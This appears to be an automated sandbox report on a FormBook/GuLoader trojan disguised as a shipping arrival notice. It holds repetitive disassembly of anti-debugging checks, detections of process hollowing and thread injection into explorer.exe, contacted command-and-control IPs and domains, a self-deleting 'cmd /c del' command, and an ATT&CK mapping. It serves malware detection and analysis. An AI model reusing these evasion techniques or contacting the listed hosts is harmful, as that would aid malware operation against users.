      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04862D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0489FD9B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0489FD9B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04892990 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048935A1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048E69A6 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048961A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048961A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048E51BE mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048E51BE mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048E51BE mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048E51BE mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04891DB5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04891DB5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04891DB5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04918DF1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0486B1E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0486B1E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0486B1E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048F41E8 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0487D5E0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0487D5E0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04869100 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04869100 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04869100 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04938D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04884120 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04884120 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04884120 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04884120 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04884120 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04894D3B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04894D3B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04894D3B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0489513A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0489513A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04873D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04873D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04873D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04873D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04873D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04873D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04873D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04873D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04873D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04873D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04873D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04873D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04873D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0486AD30 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048EA537 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048A3D43 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0488B944 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0488B944 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048E3540 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04887D50 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0486C962 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0486B171 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0486B171 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0488C577 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0488C577 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048FFE87 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0489D294 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0489D294 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048652A5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048652A5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048652A5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048652A5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048652A5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048E46A7 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04930EA5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04930EA5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04930EA5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0487AAB0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0487AAB0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0489FAB0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04892ACB mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04938ED6 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048936CC mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048A8EC7 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0491FEC0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048776E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048916E0 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04892AE4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0486C600 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0486C600 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0486C600 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04898E00 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04878A0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0486AA16 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0486AA16 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04883A1C mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0489A61C mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0489A61C mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0486E620 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0491FE3F mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04869240 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04869240 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04869240 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04869240 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04877E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04877E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04877E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04877E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04877E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04877E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048F4257 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0487766D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048A927A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0491B260 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0491B260 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04938A62 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0488AE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0488AE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0488AE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0488AE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0488AE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04871B8F mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04871B8F mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0491D380 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04878794 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0492138A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0489B390 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048E7794 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048E7794 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048E7794 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04935BA5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048E53CA mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048E53CA mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048903E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048903E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048903E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048903E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048903E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048903E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048A37F5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0489A70E mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0489A70E mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0492131B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0493070D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0493070D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0488F716 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048FFF10 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048FFF10 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04864F2E mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04864F2E mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0489E730 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0486DB40 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0487EF40 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04938B58 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0486F358 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0486DB60 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0487FF60 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04893B7A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04893B7A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_04938F6A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeProcess queried: DebugPort
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeProcess queried: DebugPort
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeProcess queried: DebugPort
      Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPort
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_0078CE61 LdrInitializeThunk,

      HIPS / PFW / Operating System Protection Evasion:

      barindex
      System process connects to network (likely due to code injection or exploit)Show sources
      Source: C:\Windows\explorer.exeNetwork Connect: 209.99.40.222 80
      Source: C:\Windows\explorer.exeNetwork Connect: 142.111.236.6 80
      Source: C:\Windows\explorer.exeDomain query: www.microsoftjob.com
      Source: C:\Windows\explorer.exeNetwork Connect: 160.153.136.3 80
      Source: C:\Windows\explorer.exeDomain query: www.wxsjykj.com
      Source: C:\Windows\explorer.exeDomain query: www.everythingswallow.com
      Source: C:\Windows\explorer.exeDomain query: www.acooll.com
      Source: C:\Windows\explorer.exeNetwork Connect: 44.227.76.166 80
      Source: C:\Windows\explorer.exeDomain query: www.priorpublic.com
      Source: C:\Windows\explorer.exeNetwork Connect: 91.195.240.117 80
      Source: C:\Windows\explorer.exeNetwork Connect: 54.65.172.3 80
      Source: C:\Windows\explorer.exeDomain query: www.taylormakeyourlife.com
      Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
      Source: C:\Windows\explorer.exeDomain query: www.beckyhartpcpublishers.com
      Source: C:\Windows\explorer.exeDomain query: www.rlmwebcreations.com
      Source: C:\Windows\explorer.exeDomain query: www.dominionhavanese.com
      Sample uses process hollowing techniqueShow sources
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeSection unmapped: C:\Windows\SysWOW64\rundll32.exe base address: 10E0000
      Maps a DLL or memory area into another processShow sources
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeSection loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeSection loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write
      Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
      Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
      Queues an APC in another process (thread injection)Show sources
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeThread APC queued: target process: C:\Windows\explorer.exe
      Modifies the context of a thread in another process (thread injection)Show sources
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeThread register set: target process: 3424
      Source: C:\Windows\SysWOW64\rundll32.exeThread register set: target process: 3424
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeProcess created: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe 'C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe'
      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe'
      Source: explorer.exe, 0000000D.00000000.1212057520.0000000000AD8000.00000004.00000020.sdmpBinary or memory string: ProgmanMD6
      Source: explorer.exe, 0000000D.00000000.1232778111.0000000001080000.00000002.00020000.sdmp, rundll32.exe, 0000000E.00000002.1746282268.0000000003100000.00000002.00020000.sdmpBinary or memory string: Program Manager
      Source: explorer.exe, 0000000D.00000000.1232778111.0000000001080000.00000002.00020000.sdmp, rundll32.exe, 0000000E.00000002.1746282268.0000000003100000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
      Source: explorer.exe, 0000000D.00000000.1232778111.0000000001080000.00000002.00020000.sdmp, rundll32.exe, 0000000E.00000002.1746282268.0000000003100000.00000002.00020000.sdmpBinary or memory string: Progman
      Source: explorer.exe, 0000000D.00000000.1232778111.0000000001080000.00000002.00020000.sdmp, rundll32.exe, 0000000E.00000002.1746282268.0000000003100000.00000002.00020000.sdmpBinary or memory string: Progmanlock
      Source: explorer.exe, 0000000D.00000000.1243122844.000000000A716000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWnd5D

      Stealing of Sensitive Information:

      barindex
      Yara detected Generic DropperShow sources
      Source: Yara matchFile source: Process Memory Space: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe PID: 6396, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5228, type: MEMORYSTR
      Yara detected FormBookShow sources
      Source: Yara matchFile source: 0000000C.00000002.1258337207.00000000000A0000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000E.00000002.1744958474.0000000000B20000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000D.00000000.1239560173.000000000690A000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000C.00000002.1261762873.000000001E2B0000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000E.00000002.1745033505.0000000000B50000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000E.00000002.1744536176.0000000000800000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000D.00000000.1216786397.000000000690A000.00000040.00020000.sdmp, type: MEMORY
      GuLoader behavior detectedShow sources
      Source: Initial fileSignature Results: GuLoader behavior

      Remote Access Functionality:

      barindex
      Yara detected FormBookShow sources
      Source: Yara matchFile source: 0000000C.00000002.1258337207.00000000000A0000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000E.00000002.1744958474.0000000000B20000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000D.00000000.1239560173.000000000690A000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000C.00000002.1261762873.000000001E2B0000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000E.00000002.1745033505.0000000000B50000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000E.00000002.1744536176.0000000000800000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000D.00000000.1216786397.000000000690A000.00000040.00020000.sdmp, type: MEMORY

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid AccountsShared Modules1Path InterceptionProcess Injection512Rootkit1Credential API Hooking1Security Software Discovery421Remote ServicesCredential API Hooking1Exfiltration Over Other Network MediumEncrypted Channel11Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsVirtualization/Sandbox Evasion22Input Capture1Virtualization/Sandbox Evasion22Remote Desktop ProtocolInput Capture1Exfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection512Security Account ManagerProcess Discovery2SMB/Windows Admin SharesArchive Collected Data1Automated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Deobfuscate/Decode Files or Information1NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol114SIM Card SwapCarrier Billing Fraud
      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptObfuscated Files or Information2LSA SecretsSystem Information Discovery12SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
      Replication Through Removable MediaLaunchdRc.commonRc.commonRundll321Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing1DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobFile Deletion1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 signatures2 2 Behavior Graph ID: 482590 Sample: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Startdate: 13/09/2021 Architecture: WINDOWS Score: 100 36 Found malware configuration 2->36 38 Malicious sample detected (through community Yara rule) 2->38 40 Multi AV Scanner detection for submitted file 2->40 42 11 other signatures 2->42 10 NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe 1 2->10         started        process3 signatures4 54 Tries to detect Any.run 10->54 56 Hides threads from debuggers 10->56 13 NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe 6 10->13         started        process5 dnsIp6 34 www.paulassinkarchitect.nl 91.184.0.38, 443, 49817 HOSTNETNL Netherlands 13->34 58 Modifies the context of a thread in another process (thread injection) 13->58 60 Tries to detect Any.run 13->60 62 Maps a DLL or memory area into another process 13->62 64 3 other signatures 13->64 17 explorer.exe 13->17 injected signatures7 process8 dnsIp9 28 www.microsoftjob.com 91.195.240.117, 49830, 80 SEDO-ASDE Germany 17->28 30 everythingswallow.com 160.153.136.3, 49824, 80 GODADDY-AMSDE United States 17->30 32 10 other IPs or domains 17->32 44 System process connects to network (likely due to code injection or exploit) 17->44 21 rundll32.exe 17->21         started        signatures10 process11 signatures12 46 Self deletion via cmd delete 21->46 48 Modifies the context of a thread in another process (thread injection) 21->48 50 Maps a DLL or memory area into another process 21->50 52 Tries to detect virtualization through RDTSC time measurements 21->52 24 cmd.exe 1 21->24         started        process13 process14 26 conhost.exe 24->26         started       

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe25%VirustotalBrowse
      NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe19%ReversingLabsWin32.Trojan.Mucc

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      SourceDetectionScannerLabelLinkDownload
